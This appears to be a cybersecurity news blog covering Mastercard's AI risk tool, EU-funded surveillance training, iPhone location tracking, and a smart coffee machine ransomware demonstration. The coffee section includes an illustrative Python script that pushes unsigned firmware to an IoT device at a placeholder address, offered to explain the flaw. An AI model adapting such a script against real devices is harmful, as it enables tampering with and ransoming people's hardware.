Mastercard introduces AI-powered cybersecurity

Cybersecurity remains one of the hottest topics around. While browsing today’s media I noted one article claiming that cyber attacks rose by 250% during the pandemic. Apparently it was the perfect time for scammers and hackers to wield their weapons.

This may be one of the things that prompted Mastercard to launch Cyber Secure, “a first-of-its-kind, AI-powered suite of tools that allows banks to assess cyber risk across their ecosystem and prevent potential breaches.”

It all comes down to the fact that the digital economy is expanding rapidly and becoming more complex. Alongside this positive news comes the less appealing revelation that this growth creates vulnerabilities that some are only too delighted to take advantage of. For example, it is estimated that by next year one business will fall victim to a ransomware attack every 11 seconds.

Ajay Bhalla, president of Cyber & Intelligence at Mastercard, said:

“The world today faces a $5.2 trillion cyber breach problem. This is one of the biggest threats to consumer trust. At Mastercard, we aim to stay ahead of fraudsters and to continually evolve and enhance our protection of cyber environments for our bank and merchant customers. With Cyber Secure, we have a suite of AI-powered cyber capabilities that allows us to do just that, ensuring trust across every experience, for businesses and consumers.”

Cyber Secure will enable banks “to continuously monitor and track their cyber posture,” writes Polly Harrison. It will allow banks to be more proactive in managing and preventing data compromise, as well as protecting the integrity of the payment ecosystem and consumer data. It should also, of course, prevent financial loss caused by attacks.

Mastercard has based its new product on the AI capabilities of RiskRecon, which it purchased in 2020. Cyber Secure uses advanced AI for risk assessment, evaluating multiple public and proprietary data sources and checking them against 40 security and infrastructure criteria.

Harrison writes, “In 2019, Mastercard saved stakeholders $20bn of fraud through its AI-enabled cyber systems,” so it is to be hoped that Cyber Secure prevents even more theft in 2021 and beyond.

How governments snoop on us

Non-profit Privacy International (PI) has revealed how the EU funds surveillance techniques through its development aid programmes, including by training security forces in non-EU countries. PI and other campaigners are calling for reform of EU aid so that these programmes “do not facilitate the use of surveillance which violates fundamental rights.”

PI learnt of the situation following the public release of documents that revealed:

  • Police and security agencies in Africa and the Balkans are trained with the EU’s support in spying on internet and social media users and using controversial surveillance techniques and tools
  • EU bodies are training and equipping border and migration authorities in non-member countries with surveillance tools
  • Civipol, a well-connected French security company, is developing mass biometric systems with EU aid funds in Western Africa in order to stop migration and facilitate deportations without adequate risk assessments.

In an article, Thomas Brewster discusses how CEPOL, the EU’s law enforcement training agency, taught security personnel in Europe and Africa how to use malware to access citizens’ phones and monitor social media. As PI points out, some of the countries that received EU aid for this type of surveillance have a history of human rights abuses, which is why PI and other organisations want to press the EU to change its funding programme.

Edin Omanovic, advocacy director of Privacy International, said: “Instead of helping people who face daily threats from unaccountable surveillance agencies, including activists, journalists and people just looking for better lives, this ‘aid’ risks doing the very opposite.”

He added, “The EU as the world’s largest provider of aid and a powerful force for change… failure to reform is a betrayal not just of the purpose of aid and the people it’s supposed to benefit, but of the EU’s own values.”

In the EU parliament, MEP Markéta Gregorová, who works in the EU group on surveillance reforms, commented: “We just made it much harder to export cyber-surveillance and it is unacceptable that at the same time our own law enforcement agencies are training dictators to spy on their people and even recommend surveillance software. This is unacceptable and irreconcilable with our values and screams for reform.”

Some of the training materials obtained by PI promote iPhone hacking tools such as GrayKey. For example, in a training session for Morocco, participants were told that by using Graykey and Axiom together, security personnel would be able to “grab the Apple keychain from within the iPhone, granting it access to apps and the data within.” Morocco is a good example of why PI is so determined to change the EU aid programme: the country has for some time been accused of targeting iPhones to track the activity of journalists and activists. In another example found in the documents, Spain’s Policia Nacional, a CEPOL partner, trained authorities in Bosnia and Herzegovina on using malware to remotely control devices. The files also show how CEPOL and European police forces are encouraging foreign governments to spy on social networks.

It is unfortunate that the PI revelations come at exactly the same time as the EU’s announcement that it will curtail the export of certain surveillance tools, a move it claims supports global human rights: “We have set an important example for other democracies to follow.”

PI’s response was that the statement is “critically undermined by the fact that EU agencies are themselves secretly promoting the use of techniques which pose serious threats.”

It would appear that while the European Parliament and Council are legislating to stop surveillance abuses, CEPOL and European police forces are doing the opposite. This kind of situation, where the left hand apparently doesn’t know what the right is doing, is exactly the sort that those who wish to undermine the EU will seize on for ammunition. The EU must get its house in order on this important issue.

iPhone location tracking is a security risk

There is no such thing as absolute privacy or security for smartphone users. The only way to stay in control is not to store information you want to keep secret on your phone.

As Apple CEO Tim Cook said last year, “The people who track on the internet know a lot more about you than if somebody’s looking in your window, a lot more.” It should make us pause to think about how we use our phones.

Apple, according to Zak Doffman, believes it is “privacy protector-in-chief,” and iOS 14 is intended to demonstrate its privacy-first approach. Doffman points to the ongoing battle between Apple and Facebook over ad tracking, remarking, “Exploitation of our personal data has become a commodity traded between the world’s largest organisations.”

However, iOS users were surprised when Apple explained its location tracking. It is an invasive feature, and as Doffman says, “a perfect illustration of just because you can, doesn’t mean you should.”

Were you aware that this location tracking builds up a record of all the places you have visited, including times, dates, the type of transport you used to get there, and how long you stayed at each location?

Jake Moore of ESET commented, “significant locations is one of those features hidden within the privacy section which many users tend not to be familiar with. I cannot think of a positive or useful reason why Apple would include this feature on any of their devices.”

If you check out the data repository on your iPhone, you will likely see that it stores certain places, times and dates, and that is because it is trying to work out if this might be important for a photo memory or a calendar entry. But do you really want this? I agree with Doffman when he says, “I don’t need my phone tracking every single location I visit and deciding which it deems significant to save me a few seconds of effort.”

According to Apple, the device wants to “learn the places that are significant to you.” However, you can breathe a small sigh of relief when you learn that the “data is end-to-end encrypted and cannot be read by Apple.”

What this illustrates is that even though the data is encrypted, you still don’t have absolute control over the security of your iPhone. John Opdenakker, an information security expert, said, “While Apple’s encryption and device-only restriction certainly reduces the security and privacy risks, I personally switched this feature off because it doesn’t offer real benefits and just feels creepy.” He added, “What worries me from a privacy perspective is that this feature is enabled by default and that the setting is hidden away such that the average user probably doesn’t find it.”

Don’t forget that you can turn off other location-based services on your Apple device, such as location-based ads and alerts. Want to know where to find them all? Just go to Settings > Privacy > Location Services > System Services, which is also where Significant Locations lives.

Would you pay a ransom for your cup of joe?

If you’re a gadget-loving person, and you enjoy your coffee, then there is a very good chance that you have a coffee machine. However, I don’t suppose you’ve ever thought it might be a cybersecurity threat.

Davey Winder, a tech journalist, points caffeine addicts in the direction of a new report by security research firm Avast, which has discovered that “smart coffee machines can not only be hacked but can be hacked with ransomware.”

One of Avast’s senior researchers, Martin Hron, wrote in a recent blog post, “The fresh smell of ransomed coffee”, about how he proved a myth was true when he turned a “coffee maker into a dangerous machine asking for ransom by modifying the maker’s firmware.”

Proving a myth

Hron goes on to say: “I was asked to prove a myth, call it a suspicion, that the threat to IoT devices is not just to access them via a weak router or exposure to the internet, but that an IoT device itself is vulnerable and can be easily owned without owning the network or the router.”

What Hron discovered was that the coffee machine acted as a Wi-Fi access point when switched on, establishing an unencrypted, unsecured connection to a companion app. From that point he was able to explore the machine’s firmware update mechanism, finding that updates were neither encrypted nor signed, so no authentication was required to push new firmware. Hron, behaving as a hacker would, then reverse engineered the firmware bundled with the machine’s Android app.
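To make the weakness concrete, here is a minimal, purely illustrative Python sketch of what an unauthenticated firmware update flow looks like from an attacker’s side. The address, port and endpoint paths below are hypothetical placeholders, not details from Avast’s research; the point is simply that nothing in such a flow checks who is asking or verifies a signature on the new firmware.

    import requests  # third-party HTTP library: pip install requests

    # Hypothetical address of an IoT device that exposes its own open Wi-Fi access point.
    # Real devices use different addresses, ports and paths; these are placeholders.
    DEVICE = "http://192.168.4.1"

    def read_firmware_version() -> str:
        # Ask the device for its current firmware version.
        # No credentials, no TLS: anyone who joins the open access point can do this.
        resp = requests.get(f"{DEVICE}/firmware/version", timeout=5)
        resp.raise_for_status()
        return resp.text.strip()

    def push_firmware(image_path: str) -> bool:
        # Upload a replacement firmware image.
        # Because the update channel is unencrypted and unsigned, the device has
        # no way to tell a vendor build from an attacker-modified one.
        with open(image_path, "rb") as f:
            resp = requests.post(f"{DEVICE}/firmware/update", data=f, timeout=60)
        return resp.status_code == 200

    if __name__ == "__main__":
        print("Device reports firmware:", read_firmware_version())
        # A properly designed update mechanism would reject an unsigned image;
        # the kind of open mechanism described above simply accepts it.
        if push_firmware("modified_firmware.bin"):
            print("Unsigned image accepted - which is the whole problem.")

The vendor-side fix is as simple to state as the flaw: serve updates over an authenticated, encrypted channel and have the device verify a cryptographic signature before flashing anything.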

Crypto or coffee?

Perhaps you’ll smile at what Hron tried to do next. He attempted to turn the coffee machine into a cryptocurrency mining machine, something he found would be possible in principle, although impractically slow given the machine’s CPU. What he did instead was perhaps more dramatic. Imagine your coffee machine starts making an ear-splitting noise and there is nothing you can do to stop it. Hron created a noise malfunction that could only be stopped by paying a ransom, or by pulling the plug on your morning coffee forever.

A noisy attack

He effectively produced a ransomware attack that nobody could ignore. Winder writes, “The trigger for the attack was the command that connects the machine to the network, and the payload some malicious code that ‘renders the coffee maker unusable and asks for a ransom’.”

Hron also went a bit further. He inserted code that permanently turned on the hotbed and water heater, as well as the coffee grinder.

Even if you have a coffee machine connected to the internet, you are probably safe, but it’s useful to know that these machines can be attacked. I do wonder, though: would you pay the ransom to have your smart coffee machine return to normal breakfast duties, or would you pull the plug and go back to an old skool method of brewing up a cup of joe?